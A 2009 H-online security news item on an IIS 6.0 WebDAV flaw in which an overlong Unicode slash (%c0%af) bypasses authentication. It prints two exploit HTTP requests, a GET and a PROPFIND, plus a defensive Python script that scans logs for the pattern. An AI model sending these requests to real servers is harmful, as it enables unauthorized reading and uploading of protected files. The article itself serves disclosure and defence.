In association with heise online

16 May 2009, 14:28

Security hole in IIS 6.0

A WebDAV vulnerability in Microsoft's Internet Information Server 6.0 (IIS) allows attackers to access password-protected directories and download and even upload arbitrary files. According to a report, the access isn't limited to WebDAV folders: the vulnerability affects all the directories controlled by the web server. It is caused by a flaw in the processing of Unicode characters.

Nicolaos Rangos, who discovered the hole, reports that a request with a header like the following example prompts IIS to return a protected file from a regular folder without any authentication:

GET /..%c0%af/protected/protected.zip HTTP/1.1
Translate: f
Connection: close
Host: servername

In this example, the slash "/" is encoded as the %c0%af Unicode character; the security function apparently overlooks this and consequently grants access to /protected/protected.zip. The Translate: f option activates the WebDAV function for regular directories. It is, however, not possible to download ASP scripts this way, unless the server has explicitly been enabled to return source code.

According to Rangos, an attack on the WebDAV folder is slightly more complex, but does enable the attacker to upload as well as download:

PROPFIND /protec%c0%afted/ HTTP/1.1
Host: servername
User-Agent: neo/0.12.2
Connection: TE
TE: trailers
Depth: 1
Content-Length: 288
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<propfind xmlns="DAV:"><prop>
<getcontentlength xmlns="DAV:"/>
<getlastmodified xmlns="DAV:"/>
<executable xmlns="http://apache.org/dav/props/"/>
<resourcetype xmlns="DAV:"/>
<checked-in xmlns="DAV:"/>
<checked-out xmlns="DAV:"/>
</prop></propfind>

WebDAV is not enabled by default. Those who have activated it should disable it, or deny remote access from the internet until further information and a solution to this problem have become available.
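Until a fix is available, web server logs can be reviewed for the pattern described above. The following is an added example, not code from the report or from Microsoft: it flags request URIs containing overlong UTF-8 sequences (%c0%af is the overlong two-byte form of "/"; the check also covers three- and four-byte overlong forms) and notes the Translate: f header or a WebDAV method when present. The function names and the third sample request are assumptions made for illustration.

```python
from urllib.parse import unquote_to_bytes

# Methods defined by WebDAV itself (RFC 4918), not plain HTTP.
DAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE", "LOCK", "UNLOCK"}
# Smallest code point that legitimately needs an n-byte UTF-8 sequence.
MIN_CODEPOINT = {2: 0x80, 3: 0x800, 4: 0x10000}

def overlong_sequences(uri):
    """Return (hex_bytes, decoded_char) for each overlong UTF-8 sequence in a URI."""
    raw = unquote_to_bytes(uri)          # undo %XX escapes, keep raw bytes
    hits, i = [], 0
    while i < len(raw):
        lead = raw[i]
        n = 2 if 0xC0 <= lead <= 0xDF else 3 if 0xE0 <= lead <= 0xEF else \
            4 if 0xF0 <= lead <= 0xF7 else 1
        seq = raw[i:i + n]
        if n == 1 or len(seq) < n or any(not 0x80 <= c <= 0xBF for c in seq[1:]):
            i += 1                       # ASCII, stray byte or truncated sequence
            continue
        cp = lead & (0xFF >> (n + 1))    # payload bits of the lead byte
        for c in seq[1:]:
            cp = (cp << 6) | (c & 0x3F)  # six payload bits per continuation byte
        if cp < MIN_CODEPOINT[n]:        # encodable in fewer bytes: overlong
            hits.append((seq.hex(), chr(cp)))
        i += n
    return hits

def review_request(method, uri, headers):
    """Return findings for one logged request; an empty list means no match."""
    findings = [f"overlong UTF-8 {h} decodes to {ch!r}"
                for h, ch in overlong_sequences(uri)]
    if findings:  # add the WebDAV context the article describes
        hdrs = {k.lower(): v.strip().lower() for k, v in headers.items()}
        if hdrs.get("translate") == "f":
            findings.append("Translate: f header present")
        if method.upper() in DAV_METHODS:
            findings.append(f"WebDAV method {method.upper()}")
    return findings

# Request lines: the first two are the article's; the third is constructed.
SAMPLES = [
    ("GET", "/..%c0%af/protected/protected.zip", {"Translate": "f"}),
    ("PROPFIND", "/protec%c0%afted/", {"Depth": "1"}),
    ("GET", "/caf%c3%a9/menu.html", {"Translate": "f"}),
]

if __name__ == "__main__":
    for method, uri, headers in SAMPLES:
        print(method, uri, "->", review_request(method, uri, headers) or "clean")
```

A legitimately encoded non-ASCII path such as the third sample produces no finding, so the check can run over ordinary traffic.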

A similar hole was discovered in IIS 4 and 5 in 2000. The security expert Thierry Zoller has compared the old hole and this new hole in his blog.


(djwm)

Permalink: http://h-online.com/-741599